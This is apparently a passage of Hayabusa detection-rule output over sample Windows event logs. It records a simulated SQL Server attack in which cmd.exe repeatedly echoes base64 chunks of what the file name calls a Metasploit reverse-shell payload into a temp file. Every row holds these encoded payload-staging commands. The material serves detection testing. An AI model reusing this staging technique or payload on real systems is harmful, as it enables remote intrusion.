RCJFk46i1UMiwZSVyLNBOibwv//i5SJQSCLGYPI/4laGIsO38MIiUEQiUEUixaJQjB0G4sGagJqAGoAx0A0AQAAAOcOi1EdUv8VqMBAAITbeR8gBmgAEAAAV8ZGLAHoXLRo/4sOiUE4TBbHQkAAEACBiwaKSCyEyXUHi3mCCMl0PFeDwFiwAFDosgsAAIXAj0UMdCmLBlDo+v26RoPEBIW4dQ6LDmi1k6gA0FfoTr8UPItFDF/kW2LlXcIUAIM93AhBADLIFov2i0iwhO1RDbITSgAAAIPEk4XAdAuLwItIGIDlBIlICe0WcABXvcJcavpm6Hih///Kx/RvFYs2aCByQABoQIRAAFaLBlDoTmH//zPAX15bLuVdwhQA3pCQVXLsgwZqVot1CI1FyMdF/AAALACLjwRQUf8VvMCMAIXTdA+LRcj2xAJ0BzPAXovlXcOLRgyFwHQRAUAIAAAAAItWi8dCDAA4AAB/RgyLVgRXjU36UFFqGWoAzwBqAGjEAAkAUv8VTsBAAIXAZpVfM8CIi+Vdw4s9mMCujM3Xg8B1Bl/vi4Fdw//XBYD8CgA9ZTsLAA+FsgAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.038 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ADA9nMBAAItOFItGEIXJfBZ/BIXAdhBlAG3oXQAAUVDoBx4AAOsHnjGD+P91BAvAk7gz9CGLRgyLSNFR/2NZgAAAAHSAhcB0MaHsfUEAi97NhcB1/1Bo7ABBANMOhocAAIPEDKPsBUEAhcB0BVcp0OsINQH/FUzAQACLRkmL4aKNVfxqJFJQUf9TtMAg+oXAdAhfM32Si+VdMos1mMBAAP/WhcB10l9eM+VdiGvWBb31CgBfXrXlXcOQrZCQkJCQkJAnTZCQkFWL+W/kdQhWNxP7//8IxAQMwHUdiwZoQJNAAEpQ6P69//9nVFhr9nQGs+hRCyoAI8Be5MIEAJCQkJCQkM6QkJBVi+xTVot1EFeLfXUz24tNCI1F1FC3EIlKEOjRFQAAi00QA7Er8YXZhcBUBD79d96LUBSFyXQCOhlfXltdwisAVfrsTOw8oRUIQQBTM9LIE/gRV4lV+IlV9IkZ9H0Xi0UQEvAIUFEgEgYAAIPECB9eKIvlm9GLD6z3wWIAcwAPWywCAACL8TPbgeYAABFRiV38iDbsdArHRfzeAACIQ138i/mB5wAAIhp0s4PLAoldhoHhAABwfIlN6HQGg8sEiV38i0UUg4UCD4XhAH8Ai1UMagRo4AAJAGoy/QAVBMFAAIPEDIXAdS2LRQy7BABwWFODwG0ugAH8AFD/FQTNhUODxMPewHX3/k1LFrYAAAAXx0EMXABiTAZBAIVXdRl0aGgBQQBqAei2gwAAg/5NXEwGLACFwHQSi03ojVXs99lSjVXwG8nRACPK7ez4999RjU1Dlf8j+YtN/AHeGyRXI/KLfQxWUY0MWmoByf/Q6wpqAf9/TKdAADPACvsGIwmLVQwLlBsMQwAzyTvBD4WtAAAAi30IiwvsaCD9zABoa5xAAIsHUlDo97v//+mzNAAAg/gBdVcj+QZBADvCURxSaFABQRpqAegXDwAAg0AMo1AGQQCFwHRfi03ojVXsCdkvjVXT7D1qACPKoFX4999RCE30G/8j+YtNDPclG/ZXu/JWU2oBUf+w6ZH///8FLA+FkjcAAPZUBkEAp8J1vVIOQOlBM2oBLLgOAACDxAwZVAZBsoUQdaFqAWcVTMBIYohP3P8Xi30IiU1CiU30iU34OU3odGHFVRBS6Ogn1gAAXMTA61IWRfgzySzBdFqJR8WLRzkNAAABAC1HBItF9DvBdA6JRxSLRwQNANYC84lHD4xF8GrBzWOLtxBQrVfogT4AAIPEDOsPX164eBEBAFtP5V3Di30Ig57cCEEAMg+M7gEAAD5FELsAAgAAhUsPhAsBAACDOgwBD25pATmQi3UUhfam0V50BokAhcB1GVBoucNBaWoF6OkNAABNowyjdN1BAIVJVTtqBY1NxGogUYtNDNBV5JF3n9DHwA+LvgAAI4tF5IXAD9UgAAAAi/A3i1XEsUc0i+YEiVepC8PF0i0AAGoB/xVMwEAA69WLHUzA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.311 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 4gBqAP//3/4CfW6hYAbjAIXAdTlQaNcBQQBQlwQN+pWjYAZnAOsfg/4BwjehXBZYAIV7dQVQaPgAQQBQ6FMNqQCjXAbrAKplDIVodA6LVQyNFwhRUv/Qi/DrC2oB/9Mz9qYSOnUMg/7SdQr/FZjAQKqFwJoai00IM5ALxjPSiW4wi0cEZsqAzAKJTzSJygTRRwTvdRD30CzGX/f6G8Beg3gRAQDti+WSw5CQkJCQkJCQkAyQUYuji0V2UP/9TcBAADOpXcOQkZCQkJDgkJCQkIhokJBVi+yDYehTM8CwV4stDIlF7IlF8IvHM9slAEdAAIldW4ldCYld6IlFZHRNOR2EBkEAdUVohAZBAFNTU/RTcd9TjU30agFRiF1FyV31iOL2iF33iF34xsf5Af8VCMBAAIXAxQ+9gEZAAOg/GAAAg8QE6waJHYQG9AA9dQjjxwAAEAB0b/dG/wAAAQB0ZthIBtEAi1YmO7fHReq0AAAAibrJFh1TaIwBQQBqAVwRDAAAKMQMOwej2AbbAL9lhwAAlI1NDI1V4FGKTRBSUf/QRcOQIYtVDGoIUuhEAQDVi04Ig/EIC8iL8wQxAJMQAIlOCIlGBPfHAE4gAA8xgboAAPdG9QAAAgCjeItGFMdF7AIAAACJRfChCgYDADvDdRlTI9UBQQBqsuiWMQAAg8QMO8Oj6QZBAGcajU0MjVXgUYtNUFJR/9DrFGop/xVMwEAAkoGKAdQVIAQ2AOsEO8N/IYu3DGoEUui3AEsAi68IvMQIC8iLRgQNAAAgAIlOCNJGBDld/HRn/OsNquYQz6MV6zfl88G9Iej7AgAAkOsMxX/mP19+fnFSCPH6YInlMdLrDGSgW2TH0nU6re5o1WSLUjDrDPAgnuMi4SLv8nZxt4tSDJCLUhSQ6w8DqYDqQ+21l/u+T3oRnDDrDLxhTda/6H/b0M9po4tyKJDrDWK5NisF9U6iLwJT9woPt0om6wv+48qISP2Poipl+DH/kOsLdiE03/EqaUGzUwaQMcCQ6whggJyCIf/GaqyQPGGQfA+QLCCQ6wlFKUJfx9DR2YOQwc8N6wqIhGwkKJV7M2SSAcfrDxbCE5/MhOUzEEbXvXkhgUl1tpBSkOsIR2j7O96rtQ9XkOsK6OEZYZYtNIb5AYtSEJCLQjyQ6wtvHO6CtppXUZfrwgHQkItAeIXAkA+EtgEAAOsJvBHhi5cnz6vJAdDrD12ZWMG2rWEDmeWRyuaFWlCQi0gYi1ggkOsKWj6NjF2V6/wP7wHTkOsMxs4Ny3WWoZb9DEkykOsPUGhe0FYUivF+muOt2x/jhcmQD4RGAQAAkOsOvZ+yYJE+39wN+IDWXMhJizSLAdaQ6wtQFwEqgj9bn18lTzH/kOsKShDNuj3pWEjOv5DrDij9+3UKqbBF2wGyxXDuMcCQ6w4Cplr2VcWyhpYN5gTVkayQwc8NkOsOIhqtsOiPVxK+FrdCnvQB>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.583 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo x+sIyJOqipK4o6w44A+Fsv///+sJVWXfDqpkc3LGA3346wkmy805CdaC7xk7fSTrCXoq/AyR3Z+p2g+FNv///5DpDQAAAEOAGPBCPwsOEOS4SPxYi1gkAdOQZosMS+kIAAAA4ZF6dTR1EKmLWByQAdPpDgAAADzr22+JJD6d2vOvQtJpiwSLkAHQkOkMAAAApjTuBCYQRood+3hYkIlEJCSQ6QsAAAB0lVBKaS++djGx3VtbkGGQWVqQUekIAAAA2kGuwS1Wa+X/4OkIAAAAZ4kDrCJTk4mQWJDpCQAAAPjvPDpX5tzz81+Q6Q8AAACEMdRbvwr7DZMyxev56uFaixKQ6WD9///pCQAAAPUlzX6HtN4PzF2Q6Q8AAABwuGpzUMvE5pad0q5uc5G+GwEAAOkIAAAAfoWOrSYS922Q6Q8AAAD+0GR7iAeQMW7un57/X4tqQGgAEAAAVpDpDQAAAAUQfxQtECQH+leljZ1qAGhYpFPlkP/VicPpCwAAABDRzwj7WJYUuekXiceJ8ZDo9QAAAJDpCQAAAJ3VijUXjciCwl6Q8qTpCAAAANEGnMe8MHFO6KEAAADpCAAAACZD37TiNo/ckLvgHSoKaKaVvZ2QieiQ/9CQPAbpDAAAABAGNsMwWSS98MHinQ+MRgAAAJDpDwAAAPT9Rhy9AGSJMBUnVhTH34D74JDpCAAAAGzD5M415AjID4UaAAAAu0cTcm+Q6Q8AAADbVWp20uhp2BJ/MI81JZhqAFPpDAAAAC2gRnCgjOhn04XwHP/V6QgAAAATIH2zFQozkDHAZP8wkGSJIJDpCwAAAEFMN7ar3r5mm3QR/9PpCQAAAHCGRysfPIS5B+k9////6BX////86IIAAABgieUxwGSLUDCLUgyLUhSLcigPt0omMf+sPGF8Aiwgwc8NAcfi8lJXi1IQi0o8i0wReONIAdFRi1kgAdOLSRjjOkmLNIsB1jH/rMHPDQHHOOB19gN9+Dt9JHXkWItYJAHTZosMS4tYHAHTiwSLAdCJRCQkW1thWVpR/+BfX1qLEuuNXWgzMgAAaHdzMl9UaEx3JgeJ6P/QuJABAAApxFRQaCmAawD/1WoBaAoXewtoAgARXInmUFBQUEBQQFBo6g/f4P/Vl2oQVldomaV0Yf/VhcB0DP9OCHXsaPC1olb/1WoAagRWV2gC2chf/9WLNmpAaAAQAABWagBoWKRT5f/Vk1NqAFZTV2gC2chf/9UBwynGde7DgKJAAEiLAIvoDPj//13CBABADCGQkMGQkKacwgQAkJCQF4yQkCiokJBVi+yLOUmLrxSFQXQzi0257VD/FSrAQACFuXUe74uZmMBAABdqhcB1BV5dwggA/9a0gPwKAF5dwggAM8BdwggAuDtORgBdwggAkJCQkIyQkMOQ2L+QkMOQkJCQkJBFkJBViySDPUcIEABtfCNoKAdBUv8VQMBMAItFA2gxV0Bkjrpe>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb44 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:19.857 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo zgBohQecAFDoobH//zMMXcOQkJCQQ4+Q/JCQkLyQaCgHQez/FTzAQAAzwMOQkFWL7ItFCIvIgeEAAADAgfnLAADALgypAAD/P7gFAAAAdAW4xAAAql3DZpAXkJCQkKCL7EhFFFaIdXgZ2CjA09hIUDHMFFD/FZzAnwAj14lFFEVLi6Y1qU0RUVL/FSTAQIqFwHRKi6oMi00UhcB0AokIi1XAhdJ0C1Hogv///4PEpokCi5YUUP8V/cBAv8exFNq0AHO4dREBAKBdwhAAZgJz1wBaCrh2EQEAXiXCEHEkNZjAQF8s1oXAdQVeXcIQAP/WBYD8CgBeZcIaAJCQkAkL9uyLTRCLRQiFyVZ0HI10CP87xnMRi1UMigqEyegIdAlAXDvGcvLGAJReXcLLAJBViyNTIdyowXIAVleLgQhqL1f/02pcV4vw/9ODxBA7xnbVi/CMMHUO3zpX/9Mu8IOjCIUDdAqNRgFMXltdwgS0i8dfXvFdwgQAkKaQkNBJkFVSMoPsGCyLXRCF21f5QfwAAAAAfROLRQwz24PuALcJi0yYBM6FyXX3jQSdBAAAAFZQ/xVcwUAAncQEi/j124l99H5Ei0UMwiArxxVd+IkwEOsDC0V3iykwUf9JicFAAIPEBECJBotV/APQi0X4gsYESInJ/IlF+ETZzUX8jURAAaWJRfzKnlztQOaixAQzyYXbiUUNi/B+VPhFDBxN9CvBi03IiUX0iekMeV2N6wOLRQB41fJN7I1N/IlV8Ik3iwQHUY1V8J9SqehZBQAAi038i0V1K8GDxwQD8ItFDEiJRQyz5ot99FVNrItF+McEjwUAjSbG/QAr8AN3UP8VIMFAQHpN+IPE/TsAD/AxK8GL10k0att+NosUhwNrshSHq2jD/fOLTQgSbIk5X1uL5V3Di1XyHsOJOl9biytdw4tFCIk4oMOiW8blucNkkJCQYFWL7KHc3UUAVpzAVw+F6QEA/2j4B0EAxwX4B0GelAAAAP8VIMBAAKH0CEEAg/gCD4W0AQAAoAwIQQC+kXxYADAbdDuLPUDBQAChdMFAAIM4RX4OM8mK4IoOUf/Xw44I6xGheMFA4zPSihaLCIoEUYPgEdvAdTaKRgHrhMB1y4sNtwgEAKH8tEEAg/ihD4JfAQAuD4RZARIAgwoEdWWD+VZzI7goAAA/6UoBAACAPgB0zVb/FajBQMqLyIPE7YkN4AgFAOu/d9u4rwAbAOklAQAAgPkDdze4K2YAAOm7AQAAg/kEdwq4LEQAAOkHATYAuiIAAL3C0RvAwGODwC3p9AAAlYP4BXVVoZzIQQCFwHUeqcl1/rgyAOAAA9gAAAAzwAf5Wg+VwINDM+nIE6QAg/gCegpNBwDdAOlyAAAAg/kBxAp6PFkAAOmqAAAAM8CD+YyhlRiDwD3pmgBfAIOXXPfYG8Ak9oM0UEqJQwAAg/gBdX+jjtb/AL52CFsAhMB0O4s9aMFA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x109c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.131 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo omN0wUAAzTgBfrkzyWoBig5R/wGDxAjrEaF4wUAAM9LNFhMIKgRRg+D9hcDCCIpG7EbEwITLoQAIQQCh+ApzEIoOM8CA+UMPncCNRAA34iGD+FoMEIoOM7WA+UEPncCNRDAO6wy4c3oAAOsFuAEAAACj3AhB34tVCJ2JAtU13AhBnzPAg/4BD53ASIclLk4AAF3DkJCWkJCQkJBVi+yLRQhWiwyF5AhBAA40heQIQQCFMW8XiwQcVMRAAFD/FRjAQACFwOsGdQNeqsOLkB6FwHQNiw5QUf8VHARAAF5dw4suDIsGUlBwFRzAQABeXcOQkM2QkJAMTpA7kJBVpuyD7OVTSdKLVqWLF/XSiVX4dQ5f6jPAmIuEXcIQAN5V+ItNFIM5cmDqi9pSM8CKBpGEwIl1CDMZBombixFGiRGLPBBmiTeDwQL6TRC0yAEAAIvIgeHABwAAgPmnD5yHoAAAmb/gJQAAvsiJVfAjz4Pbvp8AAAAz0jvPiXQEiVPsdTQ7PGkwi8dk07kBAAAA6NoNAAAL+AvaRoP+JQ91/NdIi0XsiwjwJccjyzvHdQQ7y3SFi0Xsi1Xwi8vP0YvrI0yLVfz31iPwjUIBiUX0UVH4hnEPhp0BOgC++gHzEnWzg0MeM//nx69nX164FgAAAFuLfgXCEAALgHUet0DHD6SVjIoC//+JKYz/AAAA9MQrI9OHzHTTiwblU/oCdRGD/g1WLW3JdSmYZAj2ACDrH4P6A3Uchcl/kXwFg/4E66qD/i11DIXJdQiLRcH2ADAfmal9FLgCAABvO8KLHxvA99hAO9gPgqr+//+F0nQ/iz8I6wOLVfyEJUo0B4lV6rgCgeLApwAAR4D6gIl9CA8hV///dg+k8QaD4D+ZweYG6WYLriTwi5z8hcCLyuXGEEWSR1X0K8JWMwyzyU8Cfxd8CIH+AAABAHMNvUUUixBKiRCLRRDrPItFFIsCFMP+gcYAAP//g9GSiRiL0YvGuQoAcszoeQwAAGaLyItFEBLN2IHm/wPLymaJCIPAAuPOANwAP2aJwbfAAh5FEIt9DLsHhcCJRfgPhfX9//9fl1uL5V3CEBNfXrh4AgEAW4vlXcJwAJCQkMKQkJDtkJAQrpD+VZzsg+wIi1XQU1ZXizqF/4m6/HUOxV4zwFvJ5V3CEL7EffyLRRSDmwAeNpd1CDPJZosOg8YCgfn/AAAAiXUIfRZPRc9lME6JA/ZFWIgIQIlFEOlJ5gAAi8Elz/wAAD0AgAAALIQeAQAAPQDYAAB1RoP/Ag+C/gAAAGaLBovQgUwA/AAAgfoAMQAAD4X1AADEgeH/AwAAJRIDAADB4QoLwYPGCJmLc4v6gcMAlwEAiXUIg7AA6weLwZnG2Iv6i8OL17kLAAAA6FULFQAIyL4BAAATC8p0EbkFAAAA6EALAACLyEYLynXvi1UUOzIPg8D//7y4AgAAO4tVDDvG3/b8G8n32W3Bg03/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x870 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.404 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo SBK5iQKLRdCLEBL7phCLeBCF9o1MMgHmgAAAAImNEHQwi8fR+u3CCYlF2YrDJD+JTdeSFQTXiAGLw7kGsGUAnNS+AMOLTfiL2ItF/E6L+nXQi1UMCtiIWf/+AoUuiUX8D4Wy/v//X6pbi+Vd0hAAX164eBEBAFtF5V3CPAB0kbgWAHEAW4vlXZoQAJCQkJCQkBWQ7Y+QgJBV5OyL3giD6ETkEP+zDDVAAMcAsScAADPAXcN9RRSLTRAvVVBQUVJMFFcAAIPEDF3DkJCQkJCQkJCQkJCQkJCQus/s3UUQi00Mg+0QcxD/kXjBQADHeBwAswAzwP3DU1ZbdQhXvwQAawCKFkY8Y4hFEHYai0UQu2QAUQAlCgCkAJn3+wQwiLwQiAFB6wQ8REMXi0UQuwoAAAA1/wBwAJn3+wQwiAFBisIEMIgBycYBLkFPdbWLRQxfXsZBvBZbXcNVi+yD7AwJSYt1d1eDPgB3EYsGAAAAAIzPM8Bbi+VdwgwAi10Ii0MY9sQCdGV/QwyFWXXpiwNqFFAV/+jQm2n/i0+JOIB4BInTCIkE81dXNol4IFeJvFf/FaDA1wCLUwyJ0mHiQwyLSMqFyXUlizW0wLxj/9aFwHUJX15bi+VdwgwA/9ZfwgCA/AoAW4vlhcIMAOpDMIOfMDvHi0UMdCiKmDCICIsWQEqJFol7MIsOiUUMhcl1Ecf9ActRAF9eM8Bbi+VdwgyqikssVzcPhDUBAACLU1iLPlKJ3EuJ5/jonaJ2/4PbSAF1LVOBkQNrADPJiUUIOxh0T4tDWFDomPP//4tFCF9eW4vlXcIMAIlLPIlLSIlLRMdFCAAAAFR8A4t9+IX/GIadAHgA4Us8OkNEO8hyN4tDQItLOO5VGlIgUfXo6gAAAItNzzuXB8QQO/iJRQh0ZFX4UItDVAPxiUtEE8KJc1CJ2FQEUzyLU4SLQ0Q4wjn4dwKLoouBOKdE/ET4A/LUSMHpAodTi8qPVfyD4QMD3fOkAHMsdE34bPAryItFCIlbdyZ1EPpVpoWmiWH4D4S8////Ew49JxEBADBnx0PNAdsAWHFF/ItNDK3BiQbsB8dFCAAnAACLQ1iUbQ3z//8XRQhfBFvD5V02XQCLFitNDFFSUGjoMwAAAIMkED1+EQF4iUUIVQfHQygBPwAAi0UmX4kGi0UIXluL5V3CDACVkJCQ8pCQC/+QkJCQkFUQGIuLyggci30Qi0YQi04UC8HHRRIAAAAAdXOKRgiE7HTVi1YEjSgIagBRagBqAGoA3v8VDMBAAB3GdTWLNZjAQAD/mIXAdQmLTRRfXg9CvcP/1gWA/AoAPe12TgBrBbh+PgGAi5QUX16QAQCsABdd6IvqCIXAdQ6LLhRfXokCuAtmAABdw+T4dgJm+ItGDIVDdCOKTgiZyXUci05QiUgIi0ZQi70nuSAAAADo3wbOAItWDImS2PBGDBPwDFONTRBQi0Y/UVeRUP8V>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x370 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.678 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo EMBAS/vAjAczwPeJAQAAiz2YwEAAutdAfg+EG9oAAGLXBYD8CgA9ZQALAA+F/QCfAIsdnMBAAItOJYtGEIX4fBZ/HYXAdhBqABHoAwAAUc5w8AM3AOsNI8GD+P912wtf6wK1wIvSyLSLUaBS/9OLxoH/gAAAAOq/hf+4MaGECUEAi14EmsB1GFBo7ABBAC5AYRb//zHE96Ng1/oAhcB0BVP/0OtlaoGRKd43sgCLTgyDVgSNlxBqcYVR/98VksBA2cHA1QQzwOtxix2YwEAAWNOFwHRl/9OUKfwKAD1kAH35dAc9YwAhAOEsgf8CAQAAdRKLTRSLVRBOX7g8EQEAieZeXcM97fwKAJ0Si03qi1UQ7V/28xEBALIRCF3DPaZbCgD4EvpNFIsnEFtfuH4RATyJEV5dw4XAdTiLTRCFyXUSi00Uiw8QW1+4fugBAIkRJ13Di1YMhdJ0GIp1CIRodRF2VlADV4tOVH/Ren1xUIlOVAFNJYtVEFtfiRFe+TuQkJCQkJBVpexRVovtzoqELITAD4RCAAAAzE7RM8BTg/kB54lF/IlF/w+lnAAAAIvUPOX4D4SROAAA214zg///dgXPyP/rAgpLi1bwjU38agBRUFNS/xUUwEAAhcB0L4uL/ItWUItOVPfQg9EAK/gD2IlWUIX/iU5Ud8IXtAhfx0Y8AAAGsFueG+VdwgQAiz2YwEAA/9eFwHUFiUUI6wqf1wWAJAoAiUUIREX8i1ZQi/FUFtCLRQiJiFCD0QCFwPBOVHUHx+DZAABLAItFCF9bIYtrXcIEgTPAXovlmsIhB0wbkJCQkFWLoItFCI1IArhWVVVB9+mLysHpHwPRjQSVAQDfAF3CBACQkJCQDdg64JCQkCGQkFWLJItFEItNDIsdCChRUugMAAAAB8IMHZCQtpCQ0pCQVYuui1UQiUUIHFaNSv4z9leLfQyFyX5rStIzXwgUN4PGA8HqAkCK94/NQOWwUP+0njf9amQ3/oPiYtbiusHrCsDTM9tAipLex6oAoFBXihA3/opcN/+D4g/B4gIRDQbF00CEkhhpxs+IUP+KVDf/g+I/QDvxipIYxzYAiFD/fJgb+xc78n1fM8mKDD7B6QI7SoqJGMdAADvyiP3/DRQ+dXaD6APB4gRAincZ/kAAiDD/xgA96yu87j4BM9uD4gOKGcHiBMHrBAtvJYr0rMdAAIhQ/4oJg+EPihSNGMdAAIgQQBkAt0CLVeX/AAArwpdez1tdwgwAkDI4kJCQkJCQT4M9WEBBAP8pDP90JAT/a/jAQDlZw2hL/UEAplhUQQBAdCQM6JcDAABxxAzD/3Qk/qHL////99gbwFn3m0gsnMyLRCQIi0wkEAtLfnskDHUJi2IkBPfhwhAAU/fhi9iLRCQI92QkrgOEi0kkEffhA83PwhAAzMxkzMzMzMzMzMzM/yVAwUAAzIDMzMzMzOPMzFf1U63/i0TaFAvEfUVH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x13b4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:20.951 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo i1QkEJLY99oV2OOJZyQUiVQkOrxEJBwLwH0Ufr50JBj32Pfag9gAiUQkHIlnJBgLwHUYi0y5GIsFJJgz0veIi9gqRCR09zOLs3FBie2LTCR+i0EkFC6yJCXR614h0dvR2AvbdfT38Yvw92QkoovIi0QkGPfmA9ELDjtUJBR30HIHO0R3+HYBTjPSi79PjQf32vdGHdoAW15fwhAAVYvsav9oYMf8AChIuUAAd6EAAAAAUGSJJQAAAADlGiBTVleJZeiD6zgAagH/FdCrQN1+BQ1UQFwAlYMNWEBBAP+3FdTAQH6LDZgLQQCJCP8V2MBAAIsNSAtBAIkIodwOQACLAKMlQEEA6J/nAACDMVANQQAAdQyJ1LlAAP8V4MBCAFnocAKTAGgMhUAARyHQbgDoWwIAAKGQXV4AiUXYjR7YUP81jAtBAI1F4FCNRdSDjUXke/+f6MBAMWjr0EAAaABf/OvoWgIAAP8VzcBAAIth4Ilm/3Xg/3XU/3Xk6ONYk9NBxDCpRdxQ/5S4wUAAi0Xsi1yLCYlN0FBR6OsBlwDHWQOLZej/ddD/FfTAQADMhczMzN3HVzMyi0SIEAvASBRIi+EkYffY99qD2ACJRCQQiXUkmpVEJBgLwH0TUVQkFNnY99qD2AArRCQYiVQkFAtedfaLTMoUi0QkEOXa9/ELRCQM9/GdnzPST3lO61OL2ItMJBSLVCQGi0QkDNGj0dnRc9HYC9t19Pfxi8j3ZCQYkfdkvBQDxsMOO1QkWXcIcr47RCQMdv/BRHwUm1ReGCsKdgwbVCQQT3kH94T32IPagNlbwhAAzMzMzMzMIKigzMwtzMyAp0BvFoD5a3MGD6/Q0/obi0XBSYSA4RXT+MPB+h+LwtPMzMzMzMzMzMzMzMxF28xRPQAQAACNOyTochSB6QCkADQtABAwlNF5PQAQAABz7CvIi7KF14vhiwiLrgRQXcyAbkBzFYD5IHMGD8fCbTPDhtAzwIDh0NPiwzPAM9LDzFNWi8UkGAtidRiLTAgUi0QkEDrS98qL2M5EJAz38YvT67aLyFBcJBSLVCQQi0QkDNPp0dvR6tF9C8l19PfzA/D3ZCQYi8iLRCQUouYD0XIOO7WgzXcIcgc7RCQMdgFOPtKLxuNbwhAAzB/MzHPMzMyA+UBzFYD5oHMGDzXQ03PDiw7O0oBBH9NPwzPAM9LDzP8l/MBAAP8l8MBAAP9k5MBAAGgAAANNaAAMAR1tDQAASVmZdDPAw8P/Jcy+WQD/JYTB8gDMzMzMzMjMzMzMzMz/0szBQM8AAAAAAEMAAEIAAAAINAAAANEAAMcAAD4AAAAAAAAAPwAAAOUAfQAAACmdAAAAAJQ4xQAAAP0AKwAAAAAAAACXAAAAAACYAABMAAAAcgAAAAAAAAAAAAAAABIAAAAAAAAAAAAAAAAAAAAUAAAA7QC1AAAAYVEcAAAAewAAAAAAtgAAAPoAAAARAABN>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xcf8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
